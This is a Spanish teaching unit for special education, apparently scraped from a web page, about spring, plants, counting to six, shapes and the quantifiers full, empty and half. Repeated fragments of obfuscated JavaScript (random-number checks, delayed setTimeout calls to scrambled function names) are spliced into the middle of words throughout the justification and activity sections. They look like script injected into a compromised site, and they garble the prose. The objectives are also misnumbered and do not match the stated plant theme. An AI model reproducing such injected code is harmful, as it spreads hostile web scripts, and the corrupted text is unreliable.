UNIDAD DE INTERVENCIÓN DE PEDAGOGÍA TERAPÉUTICA: “ ¡ME GUSTAN LAS PLANTAS Y LA PRIMAVERA!“

Autora: Mª Ángeles Cortés Bernabé

JUSTIFICACIÓN Y CONTEXTO

         El eje central de esta unidad es conocer las principales características de la  primavera y de las plantas (cuidado, partes, crecimiento, identificar frutas y hortalizas, etc.). Se enmarca dentro del 3er trimestre y su temporalización dependerá del ritmo de aprendizaje del alumno, aunque la programación sea quincenal, con 4 sesiones semanales de 50 minutos. Se trabajan 2 sesiones dentro del aula ordinaria y 2 en el aula de apoyo.


         En esta unidad tratamos de que el alumno, que presenta Deficiencia Psíquica) interactúe con los demás compañeros, los conozca y desarrolle la máxima autonomía, trabajandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando algunas actividades dentro del aula ordinaria.


          Está adaptada al 2º ciclo de Ed. Infantil.

ELEMENTOS DE LA U.D.

I. OBJETIVOS.

  1. Señalar la correspondencia número-objetos.
  2. Escribir  y reconocer los dígitos y grafías de los números 1, 2, 3, 4, 5 y 6.
  3. 5.  Utilizar las posibilidades de la forma de representación matemática, para describir algunos objetos y situaciones del entorno, características y propiedades. Conceptos: lleno, vacío y mitad.
  4. 6. Identificar las formas geométricas: círculo, cuadrado, triángulo y rectángulo.

En cuanto al Programa de Modificación de Conducta:


      7. Expresar sentimientos y comunicarse mediante gestos.

II. CONTENIDOS.  

- Números 1, 2, 3, 4, 5 y 6.

- Formas geométricas: círculo, cuadrado, triángulo y rectángulo.

- Cuantificadores lleno, vacío y mitad.

- Alegría, tristeza, cariño y amistad.

- Utilización de la serie numérica para contar elementos de la realidad.

- Observación y exploración de objetos para descubrir su forma.

- Exploración y verbalización de los cuantificadores: lleno, vacío y mitad.

- Reconocimiento de figuras entre varias dadas.

- Escritura de los números del 1 al 6.

- Expresión de sentimientos positivos hacia los demás.

- Gusto por explorar objetos y compararlos.

- Interés por contar objetos y valorar la utilidad de los números.

- Disfrute con la exploración y verbalización de los cuantificadores.

- Interés por demostrar los sentimientos positivos hacia los demás.

 Temas transversales:

 Se trabajará principalmente la educación ambiental y la educación para la paz.

 

III. CRITERIOS DE EVALUACIÓN

-Reconocimiento y escritura de la grafía de los números del 1 al 6.

  – Recuento de objetos hasta 6 y correspondencia número-objetos.

- Reconocimiento del círculo, cuadrado, triángulo y rectángulo.

- Asociación de los cuantificadores lleno, vacío y mitad a hechos reales.

- Abstracción de conceptos trabajándolos en el plano.

IV. ACTIVIDADES

Primera Sesión: (En el aula de Apoyo)


1. Título: “ Las plantas del jardín “:

    ¿Cómo se realiza? Observación y debate de la lámina de la U.D., intentamos que se familiarice con la U.D. y  potenciar así su autonomía.  Temporalización Nos llevará 5 minutos.

2.  Titulo: “Lleno o vacío”:


¿Cómo se realiza? El alumno observará un cubo lleno de arena y otro vacío, serán de diferente color. Observará como vaciandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando el contenido del cubo lleno en el vacío, cambian sus denominaciones.


Dirá cosas de la casa, el colegio… que se llenan y vacían con distintos contenidos (la bañera, el lapicero…) Que juegue con cosas a llenarlas y vaciarlas. Luego, de su propio cuerpo: la boca se llena, está lleno después de comer… Temporalización: 10 minutos


 

3. Titulo: “Del 1 al 6”:


     ¿Cómo se realiza? : Manipular libremente material discontinuo, bolas, bloques lógicos y otros objetos. Entonces  empezamos a contar uno a uno. Paralelamente debemos iniciarles en la numeración escrita, asociandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando símbolo con cantidad.


- Dibujar en la pizarra los números del 0 al 6 grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes, y repasarlos con tizas de colores, indicandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando el punto de inicio y el sentido del trazado correcto de cada número.